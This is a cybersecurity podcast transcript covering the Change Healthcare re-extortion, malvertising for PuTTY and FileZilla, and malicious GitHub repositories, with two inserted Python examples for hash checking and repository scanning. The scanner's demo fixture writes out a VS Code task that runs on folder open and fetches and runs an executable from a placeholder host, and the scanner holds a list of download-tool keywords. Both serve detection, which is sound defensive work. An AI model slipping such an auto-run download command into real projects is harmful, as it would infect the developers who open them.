The Daily Decrypt
Change Healthcare Extorted Again, Malvertising Targets IT, GitHub Scams on Developers: Navigating Cybersecurity Minefields

Today we unravel the second ransomware extortion of Change Healthcare by RansomHub, the cunning malvertising campaign targeting IT pros with malware-laden ads for PuTTY and FileZilla, and the deceptive tactics on GitHub fooling developers into downloading malware. Discover protective strategies and engage with expert insights on bolstering defenses against these evolving cyber threats.

Thanks to Jered Jones for providing the music for this episode.


Tags: cybersecurity, ransomware, malvertising, GitHub scams, Change Healthcare, IT professionals, data protection, cybercrime, malware, software development

Search Phrases:

  • How to protect against ransomware attacks
  • Strategies to combat malvertising campaigns
  • Tips for IT professionals on avoiding malicious ads
  • Safeguarding software development from GitHub scams
  • Change Healthcare ransomware extortion case study
  • Cybersecurity advice for IT administrators
  • Dealing with malware in system utilities ads
  • Best practices for data protection in healthcare
  • Understanding cybercrime tactics on GitHub
  • Preventing repeated ransomware extortions



Welcome back to the Daily Decrypt.

Change Healthcare falls victim to a second ransomware extortion in just a month, now at the hands of the emergent RansomHub group, wielding over 4 terabytes of sensitive data stolen in the February 2024 cyberattack. This comes as a result of the BlackCat exit scam.

Next, we’re turning over to a new malvertising campaign where searching for essential utilities for IT professionals like PuTTY and FileZilla leads to malware-laden ads, and you all know what I’m going to say about this: don’t click Google Ads. And finally, GitHub becomes a battlefield as cybercriminals exploit its search functionality to trick developers into downloading repositories full of malware. How can developers ensure the repositories they download from GitHub are safe and not just traps set by cybercriminals?

All right, so at the end of February of this year, you may remember that Change Healthcare, which is a subsidiary of UnitedHealthcare, was the victim of a ransomware attack by the notorious and since disbanded ransomware group named BlackCat. Well, Change Healthcare finds itself in the crosshairs of a ransomware extortion scheme for the second time in just over a month, coming from a new ransomware group called RansomHub. There hasn’t been a second attack.

But this is believed to be a result of the exit scam that BlackCat pulled, where they kept all of the ransom payment that Change Healthcare had made.

Allegedly, Optum, which is a subsidiary of Change Healthcare, paid BlackCat 22 million in ransom after the attack. BlackCat then pulled an apparent exit scam and disappeared without paying the affiliate who carried out the attack.

And according to Qualys Cyber Threat Director Ken Dunham, it’s not uncommon for companies that give in and pay these ransoms to quickly become additional targets or soft targets where their information is extorted again and again and again. Paying and giving in to these ransomware artists might seem like a quick fix to your problems, but once you’ve proven that you will and can pay, they’re gonna come after you again. The data doesn’t just disappear or get deleted.

It’s very valuable, and in this case it’s worth 22 million dollars, so even if the attackers say they’re gonna delete it, maybe they won’t and maybe they’ll come hit you again.

So even though BlackCat has disbanded, whether or not they were taken down by the FBI or performed an exit scam, the data that they pillaged from Change Healthcare is now in the hands, or supposedly in the hands, of a group called RansomHub, which is extorting Change Healthcare all over again.

IT professionals have found themselves in the crosshairs of an ongoing malvertising campaign. These attackers are using malicious Google Ads to disguise malware as popular system utilities, like PuTTY, which is a free SSH and Telnet client, and FileZilla, which is an FTP application. This research comes from Malwarebytes researcher Jerome Segura,

and he points out that even after alerting Google about these malicious ads, the campaign continues unabated. This sophisticated scheme begins when IT administrators search for these utilities on Google. The top search results, or sponsored ads, lead them through a series of cloaking pages.

These pages are designed to filter out non-target traffic such as bots or security researchers, directing only potential victims to imitation sites. Unwittingly, when these IT administrators download what they believe to be legitimate software, they instead receive Nitrogen malware, which is a dangerous tool for cybercriminals, enabling them to infiltrate private networks or steal data, deploy ransomware attacks, and was used by the notorious BlackCat from the previous story.

The method of infiltration is known as DLL sideloading, which involves the malware masquerading as a legitimate and signed executable to launch a DLL, thereby avoiding detection.

So what this essentially means is these IT professionals are probably getting the tool, FileZilla, PuTTY, that they’re looking for. The functionality might remain exactly the same, which only serves to benefit the attackers because once the IT professionals download the software, there are no indicators that it’s incorrect or fake, but this software such as PuTTY or FileZilla will then launch a separate DLL, which is just an executable that contains the malware.

So one way you can prevent this as someone downloading software from the web is to find what’s called an MD5 hash, which is essentially a signature of sorts that verifies the integrity of the file you’ve downloaded. Now, hashing isn’t necessarily something we need to get into right now on this podcast, but all you need to know is it’s sort of like math where you multiply the data from within this piece of software or do algebra or something to create this long string of characters that can’t be replicated if the files have been altered. So as soon as the files are altered, the mathematical equation puts out a different set of characters, right? So the creators of the software release this hash, they display it on their website, and then when you download the software, you run the same algorithm against that software to see if those two hashes match.

Now I personally am guilty of not always checking the hash for software. And I know a lot of other IT professionals are guilty of that as well, but it’s time to set up a new good habit and consistently check these hashes, maybe even develop a web scraper that will go grab the hash and also run the software through it, comparing it, reducing the amount of work you have to do on the other end,

but in summary, as I always say, do not click Google ads unless you absolutely have to, unless the thing you’re specifically searching for is not in the search results below and is only present in the advertisement, which will probably only be for things like thedailydecrypt.com, where I haven’t been around long enough to boost my search result ranking naturally, so eventually maybe I’ll start buying ad space, trying to get to people who are looking for the content that we’re providing.

But if you’re going to download some software, there’s no need to click the ads, especially something as popular as FileZilla or PuTTY, VS Code, whatever you’re trying to download, go find it in the search results. Do not click the ad.
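The hash check described above, written out as an added example. This is not code from the podcast, PuTTY or FileZilla. It uses SHA-256 rather than MD5 (MD5 is no longer collision resistant, so a published SHA-256 is the safer comparison), assumes the vendor lists checksums in the usual `<hex digest>  <filename>` form that `sha256sum` produces, and leaves fetching that listing to the caller so the script runs offline. The sample files and digest in `run_demo` are constructed, not real vendor data.

```python
"""Check a downloaded installer against the checksum the vendor publishes.

Added example; not code from the podcast, PuTTY or FileZilla. Assumes a
GNU-style checksum listing. Fetching the listing is left to the caller.
"""
import hashlib
import hmac
import re
import tempfile
from pathlib import Path
from typing import Dict, Optional, Set

# One line of sha256sum-style output: "<64 hex>  <name>" or "<64 hex> *<name>".
# Assumption: the vendor's published listing uses this format.
_CHECKSUM_LINE = re.compile(r"^([0-9a-fA-F]{64})\s+\*?(\S.*)$")
# Any SHA-256-shaped token, for scraping a digest out of arbitrary page text.
_HEX64 = re.compile(r"\b[0-9a-fA-F]{64}\b")


def parse_sha256sums(text: str) -> Dict[str, str]:
    """Map filename -> lowercase hex digest from a checksum listing."""
    table = {}
    for line in text.splitlines():
        m = _CHECKSUM_LINE.match(line.strip())
        if m:
            table[m.group(2)] = m.group(1).lower()
    return table


def scrape_sha256_digests(page_text: str) -> Set[str]:
    """Pull every 64-hex token out of a page (the 'web scraper' idea).
    The caller still has to pair the right digest with the right file."""
    return {m.lower() for m in _HEX64.findall(page_text)}


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file so a large installer never has to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: Path, expected_hex: Optional[str]) -> bool:
    """True only when the file's digest equals the published one.

    No published digest is a failure, not a pass: a filename the vendor does
    not list is exactly what a look-alike installer from an imitation site
    presents.
    """
    if not expected_hex:
        return False
    # Constant-time compare; lower-casing lets copy-pasted uppercase hex match.
    return hmac.compare_digest(sha256_file(path), expected_hex.strip().lower())


def run_demo() -> Dict[str, bool]:
    """Constructed scenario, not real vendor data; the digest is SHA-256(b"abc")."""
    listing = (
        "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"
        "  putty-demo.exe\n"
    )
    published = parse_sha256sums(listing)
    with tempfile.TemporaryDirectory() as tmp:
        genuine = Path(tmp, "putty-demo.exe")
        genuine.write_bytes(b"abc")
        tampered = Path(tmp, "tampered", "putty-demo.exe")
        tampered.parent.mkdir()
        tampered.write_bytes(b"abd")  # one byte changed, same filename
        renamed = Path(tmp, "putty-demo-setup.exe")
        renamed.write_bytes(b"abc")  # right bytes, but a name the vendor never listed
        return {
            "genuine": verify_download(genuine, published.get(genuine.name)),
            "tampered": verify_download(tampered, published.get(tampered.name)),
            "unlisted_name": verify_download(renamed, published.get(renamed.name)),
        }


if __name__ == "__main__":
    print(run_demo())
```

In practice you would point `parse_sha256sums` at the listing fetched from the vendor's own domain (typed in, not reached through an ad), and treat any mismatch or missing entry as "do not run". Note that a hash only proves the file is the one the publisher listed; if the listing itself came from the imitation site, the check proves nothing, which is why the digest and the download must come from the real vendor.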

And in a similar vein, let’s talk about a scam on GitHub that’s fooling developers into downloading dangerous malware. Cybercriminals are exploiting GitHub’s search features, luring users into downloading fake yet seemingly popular repositories.

This scheme has been identified to distribute malware hidden within Microsoft Visual Studio Code project files, which are cunningly designed to fetch further malicious payloads from remote URLs, as reported by Checkmarx.

So the attackers are mimicking popular repositories and employing automated updates and fake stars to climb GitHub’s search rankings.

So unlike Google, I don’t believe there are ads you can buy in GitHub search to boost your search rankings. So attackers are becoming a little more creative. Making the repository look like it’s consistently updated, helps boost the search rankings, and then naming the repositories, things that developers are constantly searching for will also help boost its rankings in its SEO.

So since many of these repositories are disguised as legitimate projects, it can be pretty tricky to identify them, but among the discoveries, some repositories were found downloading an encrypted file named feedbackapi.exe, which is an executable and is notably large at 750 megabytes. This executable is designed to bypass antivirus detection and deploy malware, similar to the Keyzetsu clipper, a notorious tool known for hijacking cryptocurrency transactions.

And unlike software downloaded from the internet by clicking on Google ads in the previous story, there may or may not be hashes for these repositories. Most likely not. Sometimes if they’re an executable or a package, they’ll provide a hash. But if you’re on the GitHub repository and you think it’s legit, they might list the hash, but that’s just the hash of their malware, giving you a false sense of security. Just be extra vigilant when you’re downloading anything to your computer, especially open source things that are generally found on GitHub.

It can’t be that hard to create a thousand GitHub accounts, or maybe you can even buy them online. And that immediately gives your repo a thousand stars, making it look legitimate.

So if you’re looking for a tool, it’s best to find it on the web from within a reputable website.

GitHub’s search feature is not the most reliable.
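An added example of the kind of offline check a developer can run on a cloned repository before opening or building it; this is not code from the podcast or from Checkmarx. The transcript says the payload was hidden in Visual Studio Code project files that fetch from remote URLs and that one sample was an oversized executable, but it does not say which VS Code mechanism was used, so the auto-run task check below is an illustration of one such mechanism (`runOptions.runOn: "folderOpen"` in `.vscode/tasks.json`, a real VS Code feature), not a description of the reported samples. The download-token list, the size threshold and the sample repository in `run_demo` are all constructed for this example; the domain `example.invalid` is a reserved placeholder.

```python
"""Offline red-flag scan of a cloned repository before opening or building it.

Added example; not code from the podcast or Checkmarx. The heuristics and the
sample repository are constructed for illustration.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

Finding = Tuple[str, str]

# Download primitives a project file has no business invoking at open or build
# time. Assumption: this list is the reviewer's own, not an indicator list.
_DOWNLOAD_TOKENS = ("iwr", "invoke-webrequest", "downloadstring", "downloadfile",
                    "curl ", "wget ", "certutil", "bitsadmin")
_URL = re.compile(r"""https?://[^\s"'`]+""", re.IGNORECASE)
_LINE_COMMENT = re.compile(r"^\s*//.*$", re.MULTILINE)  # tasks.json allows // comments
_BINARY_SUFFIXES = {".exe", ".dll", ".scr", ".msi", ".bin"}


def load_jsonc(path: Path) -> dict:
    """Parse JSON-with-comments by dropping whole-line // comments first."""
    text = _LINE_COMMENT.sub("", path.read_text(encoding="utf-8", errors="replace"))
    return json.loads(text)


def _command_text(task: dict) -> str:
    """Flatten command and args, including per-OS overrides, into one string."""
    parts = []
    for scope in (task, task.get("windows") or {}, task.get("linux") or {}, task.get("osx") or {}):
        cmd = scope.get("command")
        if isinstance(cmd, str):
            parts.append(cmd)
        parts.extend(a for a in (scope.get("args") or []) if isinstance(a, str))
    return " ".join(parts)


def scan_vscode_tasks(repo: Path) -> List[Finding]:
    """Flag tasks that run on folder open and tasks that reach out to the network."""
    findings: List[Finding] = []
    tasks_file = repo / ".vscode" / "tasks.json"
    if not tasks_file.is_file():
        return findings
    for task in load_jsonc(tasks_file).get("tasks", []):
        label = task.get("label", "<unnamed>")
        cmd = _command_text(task)
        # runOn: folderOpen prompts to run the task as soon as the folder opens,
        # i.e. before anyone has read a line of the code.
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            findings.append(("autorun-task", f"{label}: runs on folder open"))
        if any(tok in cmd.lower() for tok in _DOWNLOAD_TOKENS) or _URL.search(cmd):
            urls = ", ".join(_URL.findall(cmd)) or "(no literal URL)"
            findings.append(("remote-fetch", f"{label}: {urls}"))
    return findings


def scan_large_binaries(repo: Path, threshold_bytes: int) -> List[Finding]:
    """Committed executables far larger than the project warrants deserve a look;
    padding a binary past scanner size limits is a common AV-evasion trick."""
    findings: List[Finding] = []
    for p in sorted(repo.rglob("*")):
        if p.is_file() and p.suffix.lower() in _BINARY_SUFFIXES and p.stat().st_size >= threshold_bytes:
            findings.append(("large-binary", f"{p.relative_to(repo).as_posix()} ({p.stat().st_size >> 20} MiB)"))
    return findings


def inspect_repo(repo: Path, large_binary_mb: int = 100) -> List[Finding]:
    return scan_vscode_tasks(repo) + scan_large_binaries(repo, large_binary_mb << 20)


def run_demo() -> List[Finding]:
    """Constructed repository, not a real sample: one benign task, one auto-run
    task that downloads and launches a binary, and one oversized committed .exe."""
    tasks = r'''{
  // comment line, as VS Code allows
  "version": "2.0.0",
  "tasks": [
    { "label": "test", "type": "shell", "command": "npm", "args": ["test"] },
    { "label": "build", "type": "shell", "command": "powershell",
      "args": ["-c", "iwr https://cdn.example.invalid/feedbackapi.exe -OutFile $env:TEMP\\f.exe; & $env:TEMP\\f.exe"],
      "runOptions": { "runOn": "folderOpen" } }
  ]
}'''
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp)
        (repo / ".vscode").mkdir()
        (repo / ".vscode" / "tasks.json").write_text(tasks, encoding="utf-8")
        (repo / "bin").mkdir()
        (repo / "bin" / "feedbackapi.exe").write_bytes(b"\0" * (2 << 20))  # 2 MiB stand-in for 750 MB
        return inspect_repo(repo, large_binary_mb=1)


if __name__ == "__main__":
    for category, detail in run_demo():
        print(f"{category:13} {detail}")
```

Run `inspect_repo(Path("path/to/clone"))` on a fresh clone before opening it in an editor that honours workspace tasks. Any finding means read the task and the binary's provenance before trusting the repository, however many stars it shows; star counts and commit cadence are exactly the signals the transcript says attackers manufacture, so they are deliberately not used here.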

And that’s all I’ve got for you today. Thanks so much for tuning in.

Today I’ll be traveling to Florida to participate in the Hackspace conference, where I’m really excited to learn a little bit more about how cybersecurity and satellites and other spacecraft intertwine.

I’ll also be meeting up with dogespan where we’ll hopefully do a joint episode, our first ever one in person. So be sure to tune in tomorrow for that episode.
